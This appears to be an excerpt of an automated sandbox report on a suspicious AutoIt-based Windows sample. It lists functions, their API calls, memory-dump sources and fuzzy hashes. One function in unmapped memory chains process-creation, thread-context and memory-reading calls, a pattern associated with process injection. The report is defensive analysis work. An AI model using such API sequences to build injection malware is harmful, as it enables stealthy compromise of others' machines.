Opcode Fuzzy Hash: 611954518ee0d7573e844122a34ff9e81b0b14d1b6ef8847872171139d23112c
Instruction Fuzzy Hash: 0EF0F47292032A66CB10BAD8EC21ADE77AC9F01310F200429F814A6982DF709A44E6D1

Function 00C355FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3562C
__lock_file.LIBCMT ref: 00C3564D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 0d7a9cbc8529af5a511ca462bde29ac1ecb168fcd64949e4289cdbf5df857aeb
Instruction ID: df24b1ab6c862d86185c337b63c2818fd7eff241ea75b59c61030d8e161de37a
Opcode Fuzzy Hash: 0d7a9cbc8529af5a511ca462bde29ac1ecb168fcd64949e4289cdbf5df857aeb
Instruction Fuzzy Hash: 5001F2B1820B09EBCF12AF689C0799E7B71AF90361F408115F8241B2A1DB318A11FF91

Function 00C353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28

__lock_file.LIBCMT ref: 00C353EB

Part of subcall function 00C36C11: __lock.LIBCMT ref: 00C36C34

__fclose_nolock.LIBCMT ref: 00C353F6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
Instruction ID: 3960019e39b15c06c909e5a40bec9fb2e2d3d14fb83b3d86562c25202ba2d5a9
Opcode Fuzzy Hash: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
Instruction Fuzzy Hash: 8CF0B471921B059ADB51BF7598067AD7BE06F41374F218208F424AB1D1CFFC8A45BB92

Function 0102627D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01026A3B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01026AD1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01026AF3

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 1dad8f9910121dffa0d7cbf6e3e5242a96182de92e1270cde2e22bd8eb0e3f33
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: FD12DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9D10DEB7A4E77A4E91CF5A

Function 00C1F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be7317017a55cad2e0afcaa75da0c7b10232de38327c7a52f7fb8991dd03c55
Instruction ID: d9b477fc74e0372a3e0abf1c1af632c3732008d33aa690c81c7bfe0383bb93a4
Opcode Fuzzy Hash: 1be7317017a55cad2e0afcaa75da0c7b10232de38327c7a52f7fb8991dd03c55
Instruction Fuzzy Hash: 9661BC7460020A9FDB14DF60C890AAAB7F5EF06304F64847DE926972A1D770EEC6EB50

Function 00C21FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39c4ecff344b5927462c3bb153771eb1869a85449376b777af5acb8c922a1737
Instruction ID: b35f6725c62cb214fad0a6562ae696077753ce4b5f077327aa8fbb534ba17d40
Opcode Fuzzy Hash: 39c4ecff344b5927462c3bb153771eb1869a85449376b777af5acb8c922a1737
Instruction Fuzzy Hash: 3251E335700614EFCF14EF68C891EAE77A6AF85310F548168F816AB392DB30EE45EB51

Function 00C15AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00C15B96

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b0d1ba1e69b32a9d7ac7b824ca46ac33cb4882038b2b67508a28950f2713cee0
Instruction ID: d10f6b3b47b3467a45ec1b4496f100d2efe47fb3cc2c18305279d6fc97546867
Opcode Fuzzy Hash: b0d1ba1e69b32a9d7ac7b824ca46ac33cb4882038b2b67508a28950f2713cee0
Instruction Fuzzy Hash: 1E314C31A04A09EFCB18DF6DC484AADF7B5FF89310F148629E82993750D770B9A0DB90

Function 00C30C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00C30CB7

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c9e434a9bf51fce6fca1837675821fd9ad70eb7ab6121c14a4a02ea16ed68fd2
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D631F572A101059BC718DF49E4A4A69F7A6FB49300F3497A5E81ACB351D731EEC1DBC2

Function 00C4FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C4FCB7

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a9814036973f37605d45fd544d1a95cf3c1d47254935cad72123e3d72f8201c7
Instruction ID: dc6bedd5eeeed327161b760885b9beaee7be345db65bb8d4f4cec627542c005f
Opcode Fuzzy Hash: a9814036973f37605d45fd544d1a95cf3c1d47254935cad72123e3d72f8201c7
Instruction Fuzzy Hash: 134138746043519FDB14DF14C458B5ABBE1BF45318F1988ACE8998B362C332ED86DF52

Function 00C159B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C15A01

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 108539a7de57f08acd46eda96d21ee787eacc0ae51eb71a4de1abfa654612ccb
Instruction ID: 4ed1e39c70626970641d41ad72785b43b155516db1b418fe0c4034b183cb4984
Opcode Fuzzy Hash: 108539a7de57f08acd46eda96d21ee787eacc0ae51eb71a4de1abfa654612ccb
Instruction Fuzzy Hash: A721D571A04A08EBDB14AF52E884BAE7FB8FF55351F31886AE486D5110EBB0D4D0E742

Function 00C1C5A7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00C1C5DD

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: cad3e36dace1423c500330221d645255f304b88db2b62b7d5f53dcee8285a69b
Instruction ID: bf65dcbbc86666db949aa527529b2620a3278879ccec80038c78dae0bb22f057
Opcode Fuzzy Hash: cad3e36dace1423c500330221d645255f304b88db2b62b7d5f53dcee8285a69b
Instruction Fuzzy Hash: 9311A271904119EBCB14EB65DC85AEEB778EF96360F044126FC21A7190DE30AE85FB90

Function 00C14DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C14BEF

Part of subcall function 00C3525B: __wfsopen.LIBCMT ref: 00C35266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F

Part of subcall function 00C14B6A: FreeLibrary.KERNEL32(00000000), ref: 00C14BA4

Part of subcall function 00C14C70: _memmove.LIBCMT ref: 00C14CBA

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 33665428c7dc19dab9976f21bb865ffc9fed13809a78aa3f012f6d3daa088bf5
Instruction ID: 731630fd8f92daf5d632e2583c3635d0b49ff1c672157aa852c2981855462b54
Opcode Fuzzy Hash: 33665428c7dc19dab9976f21bb865ffc9fed13809a78aa3f012f6d3daa088bf5
Instruction Fuzzy Hash: B911E331600205ABCF18FF70C816FEEB7A9AF45710F10882DF542E7181DA719A41BB91

Function 00C4FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C4FD91

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9547fb591bf2ece31a4c13afb0c324357eb066bb32412995e131b7db9b4b20fa
Instruction ID: 873e9b79e75c50c9133a5501eb7d409dcd6015df53d7da78c92140e0048fee59
Opcode Fuzzy Hash: 9547fb591bf2ece31a4c13afb0c324357eb066bb32412995e131b7db9b4b20fa
Instruction Fuzzy Hash: 9C2155B4608301DFCB14DF24C454B5ABBE1BF89314F15886CF89A87722D731E849EB92

Function 00C15BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00C156A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C15C16

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 02e446a4f180a6092ce3e5a44bf07f3c0387d1e6bda03c21753a6edfbfd9208d
Instruction ID: 39146d687903700fe363cda95482a4463af80519ed03d56d13d70a17f64b7619
Opcode Fuzzy Hash: 02e446a4f180a6092ce3e5a44bf07f3c0387d1e6bda03c21753a6edfbfd9208d
Instruction Fuzzy Hash: C6113A31204B04DFD3208F19C880BA6B7E4FF85764F10C92EE9AA86A51D771E985DBA0

Function 00C15A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C4DD18

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
Instruction ID: b7487b5f99143b56668e7a61518451bacae2f370fa8f02f355a195c321c48283
Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
Instruction Fuzzy Hash: 65018FB9600902EFC705EB29C491D66F7A9FF8A3107244569E869C7702DB35EC21DBE0

Function 00C34863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00C348A6

Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 7431f17f5eefbc7ffaeb1a581597cb945b98019d3e1d767f528bf5654bb87d16
Instruction ID: 18909f41d6f33deae71141aeb0a92df86907a23f59e01c44ee651a72bac60ec2
Opcode Fuzzy Hash: 7431f17f5eefbc7ffaeb1a581597cb945b98019d3e1d767f528bf5654bb87d16
Instruction Fuzzy Hash: B5F0CD31921709EBDF15AFB4CC067EE36A0EF01329F158418F424EA1D1CBB89A55EF92

Function 00C14E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E7E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b14040078d43567fe94897caa5f910b4b1e1f5bce0b253c235faa3aae0ccf30e
Instruction ID: 4e6377be110e0a6cd690a77189f7dd797b02404f3f73ff0b207ae1a1b0492d1b
Opcode Fuzzy Hash: b14040078d43567fe94897caa5f910b4b1e1f5bce0b253c235faa3aae0ccf30e
Instruction Fuzzy Hash: 75F03075501711CFCB389F65E494856FBE1BF15325310893EE1E682620C7319880EF80

Function 00C30791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: c37a2d640d928be705ec836ec6fac1dc11916c0c103cb2a5d6d10632154f69d2
Instruction ID: 3e117bb9e2d2563923512c394ae670ac06dbb257d2a3c6a49fafe9ffb848df66
Opcode Fuzzy Hash: c37a2d640d928be705ec836ec6fac1dc11916c0c103cb2a5d6d10632154f69d2
Instruction Fuzzy Hash: C4E0CD3690412857C720D6599C05FEA77EDDF897A0F0841B6FC0CD7205D9609CC096D0

Function 00C78E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C78EC1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 63ef4d086802650504bd97e74a841d29bcfc76addd20adbc538aa8a52e5f1a5b
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: D7E092B0204B005BD7388A24D801BE377E1AB05304F00081DF2AAC3241EB6278458759

Function 00C15C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00C4DD42,?,?,00000000), ref: 00C15C5F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f914e046b6292216b8a9e386c4663355492030403bcded947756e6877b6b2a3b
Instruction ID: 03aead5ea716694c64ae05d8e1aff65d3090e75ac90394abbc456d8eb38106c4
Opcode Fuzzy Hash: f914e046b6292216b8a9e386c4663355492030403bcded947756e6877b6b2a3b
Instruction Fuzzy Hash: 88D0C77464020CBFEB10DB80DC46FAD777CD705710F100195FD0496290D6B27D508795

